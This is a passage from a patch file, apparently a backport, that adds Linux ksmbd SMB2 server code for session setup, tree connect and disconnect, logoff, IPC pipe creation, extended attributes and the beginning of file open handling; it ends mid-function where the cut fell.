++		   (req->Flags & SMB2_SESSION_REQ_FLAG_BINDING)) {
++		sess = NULL;
++		rc = -EACCES;
++		goto out_err;
++	} else {
++		sess = ksmbd_session_lookup(conn,
++					    le64_to_cpu(req->hdr.SessionId));
++		if (!sess) {
++			rc = -ENOENT;
++			goto out_err;
++		}
++
++		if (sess->state == SMB2_SESSION_EXPIRED) {
++			rc = -EFAULT;
++			goto out_err;
++		}
++
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
++	}
++	work->sess = sess;
++
++	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
++	negblob_len = le16_to_cpu(req->SecurityBufferLength);
++	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
++	    negblob_len < offsetof(struct negotiate_message, NegotiateFlags)) {
++		rc = -EINVAL;
++		goto out_err;
++	}
++
++	negblob = (struct negotiate_message *)((char *)&req->hdr.ProtocolId +
++			negblob_off);
++
++	if (decode_negotiation_token(conn, negblob, negblob_len) == 0) {
++		if (conn->mechToken)
++			negblob = (struct negotiate_message *)conn->mechToken;
++	}
++
++	if (server_conf.auth_mechs & conn->auth_mechs) {
++		rc = generate_preauth_hash(work);
++		if (rc)
++			goto out_err;
++
++		if (conn->preferred_auth_mech &
++				(KSMBD_AUTH_KRB5 | KSMBD_AUTH_MSKRB5)) {
++			rc = krb5_authenticate(work);
++			if (rc) {
++				rc = -EINVAL;
++				goto out_err;
++			}
++
++			if (!ksmbd_conn_need_reconnect(conn)) {
++				ksmbd_conn_set_good(conn);
++				sess->state = SMB2_SESSION_VALID;
++			}
++			kfree(sess->Preauth_HashValue);
++			sess->Preauth_HashValue = NULL;
++		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
++			if (negblob->MessageType == NtLmNegotiate) {
++				rc = ntlm_negotiate(work, negblob, negblob_len);
++				if (rc)
++					goto out_err;
++				rsp->hdr.Status =
++					STATUS_MORE_PROCESSING_REQUIRED;
++				/*
++				 * Note: here total size -1 is done as an
++				 * adjustment for 0 size blob
++				 */
++				inc_rfc1001_len(work->response_buf,
++						le16_to_cpu(rsp->SecurityBufferLength) - 1);
++
++			} else if (negblob->MessageType == NtLmAuthenticate) {
++				rc = ntlm_authenticate(work);
++				if (rc)
++					goto out_err;
++
++				if (!ksmbd_conn_need_reconnect(conn)) {
++					ksmbd_conn_set_good(conn);
++					sess->state = SMB2_SESSION_VALID;
++				}
++				if (conn->binding) {
++					struct preauth_session *preauth_sess;
++
++					preauth_sess =
++						ksmbd_preauth_session_lookup(conn, sess->id);
++					if (preauth_sess) {
++						list_del(&preauth_sess->preauth_entry);
++						kfree(preauth_sess);
++					}
++				}
++				kfree(sess->Preauth_HashValue);
++				sess->Preauth_HashValue = NULL;
++			} else {
++				pr_info_ratelimited("Unknown NTLMSSP message type : 0x%x\n",
++						le32_to_cpu(negblob->MessageType));
++				rc = -EINVAL;
++			}
++		} else {
++			/* TODO: need one more negotiation */
++			pr_err("Not support the preferred authentication\n");
++			rc = -EINVAL;
++		}
++	} else {
++		pr_err("Not support authentication\n");
++		rc = -EINVAL;
++	}
++
++out_err:
++	if (rc == -EINVAL)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	else if (rc == -ENOENT)
++		rsp->hdr.Status = STATUS_USER_SESSION_DELETED;
++	else if (rc == -EACCES)
++		rsp->hdr.Status = STATUS_REQUEST_NOT_ACCEPTED;
++	else if (rc == -EFAULT)
++		rsp->hdr.Status = STATUS_NETWORK_SESSION_EXPIRED;
++	else if (rc == -ENOMEM)
++		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++	else if (rc == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++	else if (rc)
++		rsp->hdr.Status = STATUS_LOGON_FAILURE;
++
++	if (conn->use_spnego && conn->mechToken) {
++		kfree(conn->mechToken);
++		conn->mechToken = NULL;
++	}
++
++	if (rc < 0) {
++		/*
++		 * SecurityBufferOffset should be set to zero
++		 * in session setup error response.
++		 */
++		rsp->SecurityBufferOffset = 0;
++
++		if (sess) {
++			bool try_delay = false;
++
++			/*
++			 * To avoid dictionary attacks (repeated session setups rapidly sent) to
++			 * connect to server, ksmbd make a delay of a 5 seconds on session setup
++			 * failure to make it harder to send enough random connection requests
++			 * to break into a server.
++			 */
++			if (sess->user && sess->user->flags & KSMBD_USER_FLAG_DELAY_SESSION)
++				try_delay = true;
++
++			sess->last_active = jiffies;
++			sess->state = SMB2_SESSION_EXPIRED;
++			if (try_delay) {
++				ksmbd_conn_set_need_reconnect(conn);
++				ssleep(5);
++				ksmbd_conn_set_need_negotiate(conn);
++			}
++		}
++	}
++
++	ksmbd_conn_unlock(conn);
++	return rc;
++}
++
++/**
++ * smb2_tree_connect() - handler for smb2 tree connect command
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb2_tree_connect(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_tree_connect_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_tree_connect_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_session *sess = work->sess;
++	char *treename = NULL, *name = NULL;
++	struct ksmbd_tree_conn_status status;
++	struct ksmbd_share_config *share;
++	int rc = -EINVAL;
++
++	treename = smb_strndup_from_utf16(req->Buffer,
++					  le16_to_cpu(req->PathLength), true,
++					  conn->local_nls);
++	if (IS_ERR(treename)) {
++		pr_err("treename is NULL\n");
++		status.ret = KSMBD_TREE_CONN_STATUS_ERROR;
++		goto out_err1;
++	}
++
++	name = ksmbd_extract_sharename(conn->um, treename);
++	if (IS_ERR(name)) {
++		status.ret = KSMBD_TREE_CONN_STATUS_ERROR;
++		goto out_err1;
++	}
++
++	ksmbd_debug(SMB, "tree connect request for tree %s treename %s\n",
++		    name, treename);
++
++	status = ksmbd_tree_conn_connect(conn, sess, name);
++	if (status.ret == KSMBD_TREE_CONN_STATUS_OK)
++		rsp->hdr.Id.SyncId.TreeId = cpu_to_le32(status.tree_conn->id);
++	else
++		goto out_err1;
++
++	share = status.tree_conn->share_conf;
++	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC share path request\n");
++		rsp->ShareType = SMB2_SHARE_TYPE_PIPE;
++		rsp->MaximalAccess = FILE_READ_DATA_LE | FILE_READ_EA_LE |
++			FILE_EXECUTE_LE | FILE_READ_ATTRIBUTES_LE |
++			FILE_DELETE_LE | FILE_READ_CONTROL_LE |
++			FILE_WRITE_DAC_LE | FILE_WRITE_OWNER_LE |
++			FILE_SYNCHRONIZE_LE;
++	} else {
++		rsp->ShareType = SMB2_SHARE_TYPE_DISK;
++		rsp->MaximalAccess = FILE_READ_DATA_LE | FILE_READ_EA_LE |
++			FILE_EXECUTE_LE | FILE_READ_ATTRIBUTES_LE;
++		if (test_tree_conn_flag(status.tree_conn,
++					KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			rsp->MaximalAccess |= FILE_WRITE_DATA_LE |
++				FILE_APPEND_DATA_LE | FILE_WRITE_EA_LE |
++				FILE_DELETE_LE | FILE_WRITE_ATTRIBUTES_LE |
++				FILE_DELETE_CHILD_LE | FILE_READ_CONTROL_LE |
++				FILE_WRITE_DAC_LE | FILE_WRITE_OWNER_LE |
++				FILE_SYNCHRONIZE_LE;
++		}
++	}
++
++	status.tree_conn->maximal_access = le32_to_cpu(rsp->MaximalAccess);
++	if (conn->posix_ext_supported)
++		status.tree_conn->posix_extensions = true;
++
++	rsp->StructureSize = cpu_to_le16(16);
++	inc_rfc1001_len(work->response_buf, 16);
++out_err1:
++	rsp->Capabilities = 0;
++	rsp->Reserved = 0;
++	/* default manual caching */
++	rsp->ShareFlags = SMB2_SHAREFLAG_MANUAL_CACHING;
++
++	if (!IS_ERR(treename))
++		kfree(treename);
++	if (!IS_ERR(name))
++		kfree(name);
++
++	switch (status.ret) {
++	case KSMBD_TREE_CONN_STATUS_OK:
++		rsp->hdr.Status = STATUS_SUCCESS;
++		rc = 0;
++		break;
++	case -ESTALE:
++	case -ENOENT:
++	case KSMBD_TREE_CONN_STATUS_NO_SHARE:
++		rsp->hdr.Status = STATUS_BAD_NETWORK_NAME;
++		break;
++	case -ENOMEM:
++	case KSMBD_TREE_CONN_STATUS_NOMEM:
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++		break;
++	case KSMBD_TREE_CONN_STATUS_ERROR:
++	case KSMBD_TREE_CONN_STATUS_TOO_MANY_CONNS:
++	case KSMBD_TREE_CONN_STATUS_TOO_MANY_SESSIONS:
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		break;
++	case -EINVAL:
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		break;
++	default:
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	}
++
++	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
++		smb2_set_err_rsp(work);
++
++	return rc;
++}
++
++/**
++ * smb2_create_open_flags() - convert smb open flags to unix open flags
++ * @file_present:	is file already present
++ * @access:		file access flags
++ * @disposition:	file disposition flags
++ * @may_flags:		set with MAY_ flags
++ *
++ * Return:      file open flags
++ */
++static int smb2_create_open_flags(bool file_present, __le32 access,
++				  __le32 disposition,
++				  int *may_flags)
++{
++	int oflags = O_NONBLOCK | O_LARGEFILE;
++
++	if (access & FILE_READ_DESIRED_ACCESS_LE &&
++	    access & FILE_WRITE_DESIRE_ACCESS_LE) {
++		oflags |= O_RDWR;
++		*may_flags = MAY_OPEN | MAY_READ | MAY_WRITE;
++	} else if (access & FILE_WRITE_DESIRE_ACCESS_LE) {
++		oflags |= O_WRONLY;
++		*may_flags = MAY_OPEN | MAY_WRITE;
++	} else {
++		oflags |= O_RDONLY;
++		*may_flags = MAY_OPEN | MAY_READ;
++	}
++
++	if (access == FILE_READ_ATTRIBUTES_LE)
++		oflags |= O_PATH;
++
++	if (file_present) {
++		switch (disposition & FILE_CREATE_MASK_LE) {
++		case FILE_OPEN_LE:
++		case FILE_CREATE_LE:
++			break;
++		case FILE_SUPERSEDE_LE:
++		case FILE_OVERWRITE_LE:
++		case FILE_OVERWRITE_IF_LE:
++			oflags |= O_TRUNC;
++			break;
++		default:
++			break;
++		}
++	} else {
++		switch (disposition & FILE_CREATE_MASK_LE) {
++		case FILE_SUPERSEDE_LE:
++		case FILE_CREATE_LE:
++		case FILE_OPEN_IF_LE:
++		case FILE_OVERWRITE_IF_LE:
++			oflags |= O_CREAT;
++			break;
++		case FILE_OPEN_LE:
++		case FILE_OVERWRITE_LE:
++			oflags &= ~O_CREAT;
++			break;
++		default:
++			break;
++		}
++	}
++
++	return oflags;
++}
++
++/**
++ * smb2_tree_disconnect() - handler for smb tree connect request
++ * @work:	smb work containing request buffer
++ *
++ * Return:      0
++ */
++int smb2_tree_disconnect(struct ksmbd_work *work)
++{
++	struct smb2_tree_disconnect_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_tree_connect *tcon = work->tcon;
++
++	rsp->StructureSize = cpu_to_le16(4);
++	inc_rfc1001_len(work->response_buf, 4);
++
++	ksmbd_debug(SMB, "request\n");
++
++	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
++		struct smb2_tree_disconnect_req *req =
++			smb2_get_msg(work->request_buf);
++
++		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
++
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		smb2_set_err_rsp(work);
++		return 0;
++	}
++
++	ksmbd_close_tree_conn_fds(work);
++	ksmbd_tree_conn_disconnect(sess, tcon);
++	work->tcon = NULL;
++	return 0;
++}
++
++/**
++ * smb2_session_logoff() - handler for session log off request
++ * @work:	smb work containing request buffer
++ *
++ * Return:      0
++ */
++int smb2_session_logoff(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_session *sess;
++	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
++	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
++
++	rsp->StructureSize = cpu_to_le16(4);
++	inc_rfc1001_len(work->response_buf, 4);
++
++	ksmbd_debug(SMB, "request\n");
++
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
++	ksmbd_close_session_fds(work);
++	ksmbd_conn_wait_idle(conn, sess_id);
++
++	/*
++	 * Re-lookup session to validate if session is deleted
++	 * while waiting request complete
++	 */
++	sess = ksmbd_session_lookup_all(conn, sess_id);
++	if (ksmbd_tree_conn_session_logoff(sess)) {
++		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		smb2_set_err_rsp(work);
++		return 0;
++	}
++
++	ksmbd_destroy_file_table(&sess->file_table);
++	sess->state = SMB2_SESSION_EXPIRED;
++
++	ksmbd_free_user(sess->user);
++	sess->user = NULL;
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
++	return 0;
++}
++
++/**
++ * create_smb2_pipe() - create IPC pipe
++ * @work:	smb work containing request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++static noinline int create_smb2_pipe(struct ksmbd_work *work)
++{
++	struct smb2_create_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_create_req *req = smb2_get_msg(work->request_buf);
++	int id;
++	int err;
++	char *name;
++
++	name = smb_strndup_from_utf16(req->Buffer, le16_to_cpu(req->NameLength),
++				      1, work->conn->local_nls);
++	if (IS_ERR(name)) {
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++		err = PTR_ERR(name);
++		goto out;
++	}
++
++	id = ksmbd_session_rpc_open(work->sess, name);
++	if (id < 0) {
++		pr_err("Unable to open RPC pipe: %d\n", id);
++		err = id;
++		goto out;
++	}
++
++	rsp->hdr.Status = STATUS_SUCCESS;
++	rsp->StructureSize = cpu_to_le16(89);
++	rsp->OplockLevel = SMB2_OPLOCK_LEVEL_NONE;
++	rsp->Flags = 0;
++	rsp->CreateAction = cpu_to_le32(FILE_OPENED);
++
++	rsp->CreationTime = cpu_to_le64(0);
++	rsp->LastAccessTime = cpu_to_le64(0);
++	rsp->ChangeTime = cpu_to_le64(0);
++	rsp->AllocationSize = cpu_to_le64(0);
++	rsp->EndofFile = cpu_to_le64(0);
++	rsp->FileAttributes = FILE_ATTRIBUTE_NORMAL_LE;
++	rsp->Reserved2 = 0;
++	rsp->VolatileFileId = id;
++	rsp->PersistentFileId = 0;
++	rsp->CreateContextsOffset = 0;
++	rsp->CreateContextsLength = 0;
++
++	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1*/
++	kfree(name);
++	return 0;
++
++out:
++	switch (err) {
++	case -EINVAL:
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		break;
++	case -ENOSPC:
++	case -ENOMEM:
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++		break;
++	}
++
++	if (!IS_ERR(name))
++		kfree(name);
++
++	smb2_set_err_rsp(work);
++	return err;
++}
++
++/**
++ * smb2_set_ea() - handler for setting extended attributes using set
++ *		info command
++ * @eabuf:	set info command buffer
++ * @buf_len:	set info command buffer length
++ * @path:	dentry path for get ea
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
++		       const struct path *path)
++{
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	char *attr_name = NULL, *value;
++	int rc = 0;
++	unsigned int next = 0;
++
++	if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength +
++			le16_to_cpu(eabuf->EaValueLength))
++		return -EINVAL;
++
++	attr_name = kmalloc(XATTR_NAME_MAX + 1, GFP_KERNEL);
++	if (!attr_name)
++		return -ENOMEM;
++
++	do {
++		if (!eabuf->EaNameLength)
++			goto next;
++
++		ksmbd_debug(SMB,
++			    "name : <%s>, name_len : %u, value_len : %u, next : %u\n",
++			    eabuf->name, eabuf->EaNameLength,
++			    le16_to_cpu(eabuf->EaValueLength),
++			    le32_to_cpu(eabuf->NextEntryOffset));
++
++		if (eabuf->EaNameLength >
++		    (XATTR_NAME_MAX - XATTR_USER_PREFIX_LEN)) {
++			rc = -EINVAL;
++			break;
++		}
++
++		memcpy(attr_name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN);
++		memcpy(&attr_name[XATTR_USER_PREFIX_LEN], eabuf->name,
++		       eabuf->EaNameLength);
++		attr_name[XATTR_USER_PREFIX_LEN + eabuf->EaNameLength] = '\0';
++		value = (char *)&eabuf->name + eabuf->EaNameLength + 1;
++
++		if (!eabuf->EaValueLength) {
++			rc = ksmbd_vfs_casexattr_len(user_ns,
++						     path->dentry,
++						     attr_name,
++						     XATTR_USER_PREFIX_LEN +
++						     eabuf->EaNameLength);
++
++			/* delete the EA only when it exits */
++			if (rc > 0) {
++				rc = ksmbd_vfs_remove_xattr(user_ns,
++							    path->dentry,
++							    attr_name);
++
++				if (rc < 0) {
++					ksmbd_debug(SMB,
++						    "remove xattr failed(%d)\n",
++						    rc);
++					break;
++				}
++			}
++
++			/* if the EA doesn't exist, just do nothing. */
++			rc = 0;
++		} else {
++			rc = ksmbd_vfs_setxattr(user_ns,
++						path->dentry, attr_name, value,
++						le16_to_cpu(eabuf->EaValueLength), 0);
++			if (rc < 0) {
++				ksmbd_debug(SMB,
++					    "ksmbd_vfs_setxattr is failed(%d)\n",
++					    rc);
++				break;
++			}
++		}
++
++next:
++		next = le32_to_cpu(eabuf->NextEntryOffset);
++		if (next == 0 || buf_len < next)
++			break;
++		buf_len -= next;
++		eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
++		if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
++			break;
++
++	} while (next != 0);
++
++	kfree(attr_name);
++	return rc;
++}
++
++static noinline int smb2_set_stream_name_xattr(const struct path *path,
++					       struct ksmbd_file *fp,
++					       char *stream_name, int s_type)
++{
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	size_t xattr_stream_size;
++	char *xattr_stream_name;
++	int rc;
++
++	rc = ksmbd_vfs_xattr_stream_name(stream_name,
++					 &xattr_stream_name,
++					 &xattr_stream_size,
++					 s_type);
++	if (rc)
++		return rc;
++
++	fp->stream.name = xattr_stream_name;
++	fp->stream.size = xattr_stream_size;
++
++	/* Check if there is stream prefix in xattr space */
++	rc = ksmbd_vfs_casexattr_len(user_ns,
++				     path->dentry,
++				     xattr_stream_name,
++				     xattr_stream_size);
++	if (rc >= 0)
++		return 0;
++
++	if (fp->cdoption == FILE_OPEN_LE) {
++		ksmbd_debug(SMB, "XATTR stream name lookup failed: %d\n", rc);
++		return -EBADF;
++	}
++
++	rc = ksmbd_vfs_setxattr(user_ns, path->dentry,
++				xattr_stream_name, NULL, 0, 0);
++	if (rc < 0)
++		pr_err("Failed to store XATTR stream name :%d\n", rc);
++	return 0;
++}
++
++static int smb2_remove_smb_xattrs(const struct path *path)
++{
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	char *name, *xattr_list = NULL;
++	ssize_t xattr_list_len;
++	int err = 0;
++
++	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
++	if (xattr_list_len < 0) {
++		goto out;
++	} else if (!xattr_list_len) {
++		ksmbd_debug(SMB, "empty xattr in the file\n");
++		goto out;
++	}
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++			name += strlen(name) + 1) {
++		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
++
++		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN) &&
++		    !strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
++			     STREAM_PREFIX_LEN)) {
++			err = ksmbd_vfs_remove_xattr(user_ns, path->dentry,
++						     name);
++			if (err)
++				ksmbd_debug(SMB, "remove xattr failed : %s\n",
++					    name);
++		}
++	}
++out:
++	kvfree(xattr_list);
++	return err;
++}
++
++static int smb2_create_truncate(const struct path *path)
++{
++	int rc = vfs_truncate(path, 0);
++
++	if (rc) {
++		pr_err("vfs_truncate failed, rc %d\n", rc);
++		return rc;
++	}
++
++	rc = smb2_remove_smb_xattrs(path);
++	if (rc == -EOPNOTSUPP)
++		rc = 0;
++	if (rc)
++		ksmbd_debug(SMB,
++			    "ksmbd_truncate_stream_name_xattr failed, rc %d\n",
++			    rc);
++	return rc;
++}
++
++static void smb2_new_xattrs(struct ksmbd_tree_connect *tcon, const struct path *path,
++			    struct ksmbd_file *fp)
++{
++	struct xattr_dos_attrib da = {0};
++	int rc;
++
++	if (!test_share_config_flag(tcon->share_conf,
++				    KSMBD_SHARE_FLAG_STORE_DOS_ATTRS))
++		return;
++
++	da.version = 4;
++	da.attr = le32_to_cpu(fp->f_ci->m_fattr);
++	da.itime = da.create_time = fp->create_time;
++	da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
++		XATTR_DOSINFO_ITIME;
++
++	rc = ksmbd_vfs_set_dos_attrib_xattr(mnt_user_ns(path->mnt),
++					    path->dentry, &da);
++	if (rc)
++		ksmbd_debug(SMB, "failed to store file attribute into xattr\n");
++}
++
++static void smb2_update_xattrs(struct ksmbd_tree_connect *tcon,
++			       const struct path *path, struct ksmbd_file *fp)
++{
++	struct xattr_dos_attrib da;
++	int rc;
++
++	fp->f_ci->m_fattr &= ~(FILE_ATTRIBUTE_HIDDEN_LE | FILE_ATTRIBUTE_SYSTEM_LE);
++
++	/* get FileAttributes from XATTR_NAME_DOS_ATTRIBUTE */
++	if (!test_share_config_flag(tcon->share_conf,
++				    KSMBD_SHARE_FLAG_STORE_DOS_ATTRS))
++		return;
++
++	rc = ksmbd_vfs_get_dos_attrib_xattr(mnt_user_ns(path->mnt),
++					    path->dentry, &da);
++	if (rc > 0) {
++		fp->f_ci->m_fattr = cpu_to_le32(da.attr);
++		fp->create_time = da.create_time;
++		fp->itime = da.itime;
++	}
++}
++
++static int smb2_creat(struct ksmbd_work *work, struct path *path, char *name,
++		      int open_flags, umode_t posix_mode, bool is_dir)
++{
++	struct ksmbd_tree_connect *tcon = work->tcon;
++	struct ksmbd_share_config *share = tcon->share_conf;
++	umode_t mode;
++	int rc;
++
++	if (!(open_flags & O_CREAT))
++		return -EBADF;
++
++	ksmbd_debug(SMB, "file does not exist, so creating\n");
++	if (is_dir == true) {
++		ksmbd_debug(SMB, "creating directory\n");
++
++		mode = share_config_directory_mode(share, posix_mode);
++		rc = ksmbd_vfs_mkdir(work, name, mode);
++		if (rc)
++			return rc;
++	} else {
++		ksmbd_debug(SMB, "creating regular file\n");
++
++		mode = share_config_create_mode(share, posix_mode);
++		rc = ksmbd_vfs_create(work, name, mode);
++		if (rc)
++			return rc;
++	}
++
++	rc = ksmbd_vfs_kern_path(work, name, 0, path, 0);
++	if (rc) {
++		pr_err("cannot get linux path (%s), err = %d\n",
++		       name, rc);
++		return rc;
++	}
++	return 0;
++}
++
++static int smb2_create_sd_buffer(struct ksmbd_work *work,
++				 struct smb2_create_req *req,
++				 const struct path *path)
++{
++	struct create_context *context;
++	struct create_sd_buf_req *sd_buf;
++
++	if (!req->CreateContextsOffset)
++		return -ENOENT;
++
++	/* Parse SD BUFFER create contexts */
++	context = smb2_find_context_vals(req, SMB2_CREATE_SD_BUFFER, 4);
++	if (!context)
++		return -ENOENT;
++	else if (IS_ERR(context))
++		return PTR_ERR(context);
++
++	ksmbd_debug(SMB,
++		    "Set ACLs using SMB2_CREATE_SD_BUFFER context\n");
++	sd_buf = (struct create_sd_buf_req *)context;
++	if (le16_to_cpu(context->DataOffset) +
++	    le32_to_cpu(context->DataLength) <
++	    sizeof(struct create_sd_buf_req))
++		return -EINVAL;
++	return set_info_sec(work->conn, work->tcon, path, &sd_buf->ntsd,
++			    le32_to_cpu(sd_buf->ccontext.DataLength), true);
++}
++
++static void ksmbd_acls_fattr(struct smb_fattr *fattr,
++			     struct user_namespace *mnt_userns,
++			     struct inode *inode)
++{
++	vfsuid_t vfsuid = i_uid_into_vfsuid(mnt_userns, inode);
++	vfsgid_t vfsgid = i_gid_into_vfsgid(mnt_userns, inode);
++
++	fattr->cf_uid = vfsuid_into_kuid(vfsuid);
++	fattr->cf_gid = vfsgid_into_kgid(vfsgid);
++	fattr->cf_mode = inode->i_mode;
++	fattr->cf_acls = NULL;
++	fattr->cf_dacls = NULL;
++
++	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
++		fattr->cf_acls = get_acl(inode, ACL_TYPE_ACCESS);
++		if (S_ISDIR(inode->i_mode))
++			fattr->cf_dacls = get_acl(inode, ACL_TYPE_DEFAULT);
++	}
++}
++
++/**
++ * smb2_open() - handler for smb file open request
++ * @work:	smb work containing request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb2_open(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_tree_connect *tcon = work->tcon;
++	struct smb2_create_req *req;
++	struct smb2_create_rsp *rsp;
++	struct path path;
++	struct ksmbd_share_config *share = tcon->share_conf;
++	struct ksmbd_file *fp = NULL;
++	struct file *filp = NULL;
++	struct user_namespace *user_ns = NULL;
++	struct kstat stat;
++	struct create_context *context;
++	struct lease_ctx_info *lc = NULL;
++	struct create_ea_buf_req *ea_buf = NULL;
++	struct oplock_info *opinfo;
++	__le32 *next_ptr = NULL;
++	int req_op_level = 0, open_flags = 0, may_flags = 0, file_info = 0;
++	int rc = 0;
++	int contxt_cnt = 0, query_disk_id = 0;
++	int maximal_access_ctxt = 0, posix_ctxt = 0;
++	int s_type = 0;
++	int next_off = 0;
++	char *name = NULL;
++	char *stream_name = NULL;
++	bool file_present = false, created = false, already_permitted = false;
++	int share_ret, need_truncate = 0;
++	u64 time;
++	umode_t posix_mode = 0;
++	__le32 daccess, maximal_access = 0;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (req->hdr.NextCommand && !work->next_smb2_rcv_hdr_off &&
++	    (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)) {
++		ksmbd_debug(SMB, "invalid flag in chained command\n");
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		smb2_set_err_rsp(work);
++		return -EINVAL;
++	}
++
++	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC pipe create request\n");
++		return create_smb2_pipe(work);
++	}
++
++	if (req->NameLength) {
++		if ((req->CreateOptions & FILE_DIRECTORY_FILE_LE) &&
++		    *(char *)req->Buffer == '\\') {
++			pr_err("not allow directory name included leading slash\n");
++			rc = -EINVAL;
++			goto err_out1;
++		}
++
++		name = smb2_get_name(req->Buffer,
++				     le16_to_cpu(req->NameLength),
++				     work->conn->local_nls);
++		if (IS_ERR(name)) {
++			rc = PTR_ERR(name);
++			if (rc != -ENOMEM)
++				rc = -ENOENT;
++			name = NULL;
++			goto err_out1;
++		}
++
++		ksmbd_debug(SMB, "converted name = %s\n", name);
++		if (strchr(name, ':')) {
++			if (!test_share_config_flag(work->tcon->share_conf,
++						    KSMBD_SHARE_FLAG_STREAMS)) {
++				rc = -EBADF;
++				goto err_out1;
++			}
++			rc = parse_stream_name(name, &stream_name, &s_type);
++			if (rc < 0)
++				goto err_out1;
++		}
++
++		rc = ksmbd_validate_filename(name);
++		if (rc < 0)
++			goto err_out1;
++
++		if (ksmbd_share_veto_filename(share, name)) {
++			rc = -ENOENT;
++			ksmbd_debug(SMB, "Reject open(), vetoed file: %s\n",
++				    name);
++			goto err_out1;
++		}
++	} else {
++		name = kstrdup("", GFP_KERNEL);
++		if (!name) {
++			rc = -ENOMEM;
++			goto err_out1;
++		}
++	}
++
++	req_op_level = req->RequestedOplockLevel;
++	if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE)
++		lc = parse_lease_state(req);
++
++	if (le32_to_cpu(req->ImpersonationLevel) > le32_to_cpu(IL_DELEGATE)) {
++		pr_err("Invalid impersonationlevel : 0x%x\n",
++		       le32_to_cpu(req->ImpersonationLevel));
++		rc = -EIO;
++		rsp->hdr.Status = STATUS_BAD_IMPERSONATION_LEVEL;
++		goto err_out1;
++	}
++
++	if (req->CreateOptions && !(req->CreateOptions & CREATE_OPTIONS_MASK_LE)) {
++		pr_err("Invalid create options : 0x%x\n",
++		       le32_to_cpu(req->CreateOptions));
++		rc = -EINVAL;
++		goto err_out1;
++	} else {
++		if (req->CreateOptions & FILE_SEQUENTIAL_ONLY_LE &&
++		    req->CreateOptions & FILE_RANDOM_ACCESS_LE)
++			req->CreateOptions = ~(FILE_SEQUENTIAL_ONLY_LE);
++
++		if (req->CreateOptions &
++		    (FILE_OPEN_BY_FILE_ID_LE | CREATE_TREE_CONNECTION |
++		     FILE_RESERVE_OPFILTER_LE)) {
++			rc = -EOPNOTSUPP;
++			goto err_out1;
++		}
++
++		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
++			if (req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE) {
++				rc = -EINVAL;
++				goto err_out1;
++			} else if (req->CreateOptions & FILE_NO_COMPRESSION_LE) {
++				req->CreateOptions = ~(FILE_NO_COMPRESSION_LE);
++			}
++		}
++	}
++
++	if (le32_to_cpu(req->CreateDisposition) >
++	    le32_to_cpu(FILE_OVERWRITE_IF_LE)) {
